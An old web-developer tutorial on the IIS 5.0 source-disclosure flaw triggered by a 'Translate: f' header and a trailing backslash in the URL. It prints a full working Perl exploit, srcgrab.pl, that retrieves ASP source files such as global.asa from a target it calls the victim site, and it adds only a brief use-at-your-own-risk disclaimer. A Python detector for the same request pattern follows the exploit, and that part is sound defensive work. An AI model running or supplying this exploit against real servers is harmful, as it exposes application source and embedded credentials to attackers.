ASP source disclosure in IIS5
Source: China Web Developer Network (http://www.webasp.net), Technical Tutorials, http://www.webasp.net/article/18/17323.htm
Author: unknown -- Published: 2005-04-05
When IIS 5.0 receives an HTTP request that carries a specially formatted header (Translate: f) and whose URL ends with a special character, IIS handles the request incorrectly and discloses the file's source code.

The following code is intended only for testing and researching this vulnerability; if you use it for improper purposes, you bear the consequences yourself.

```perl
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using
# a shared drive but I haven't tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
    print qq~
Geee it's running !! kewl :)))

Usage : srcgrab.pl
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~;
    exit;
}

$victimurl = $ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
    print $res->content;
} else {
    print $res->error_as_HTML;
}
```
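For the defending side, the request shape described above (a `Translate: f` header combined with a URL that ends in a backslash) can be matched on raw request heads captured by a reverse proxy or IDS. The following is an added example, not part of the original article; the function names and the sample requests are constructed for illustration.

```python
from urllib.parse import unquote

def parse_request(raw: str):
    """Split a raw HTTP/1.x request head into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def is_source_disclosure_probe(raw: str) -> bool:
    """True when 'Translate: f' is paired with a path ending in a backslash."""
    try:
        _method, target, headers = parse_request(raw)
    except ValueError:
        return False  # malformed request line; leave it to other checks
    # Translate: f alone is not enough: WebDAV clients send it legitimately.
    if headers.get("translate", "").lower() != "f":
        return False
    path = target.split("?", 1)[0]
    # Decode a bounded number of times so %5C and %255C match a literal backslash.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.endswith("\\")

# Constructed sample requests (www.example.com is a placeholder host).
SAMPLES = {
    "probe": "GET /default.asp\\ HTTP/1.0\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "encoded": "GET /global.asa%5c HTTP/1.0\r\nHost: www.example.com\r\ntranslate: F\r\n\r\n",
    "webdav": "GET /docs/report.doc HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "plain": "GET /default.asp HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
}

def flagged_samples():
    """Return the names of the constructed samples that match the probe shape."""
    return sorted(name for name, raw in SAMPLES.items() if is_source_disclosure_probe(raw))

if __name__ == "__main__":
    print(flagged_samples())
```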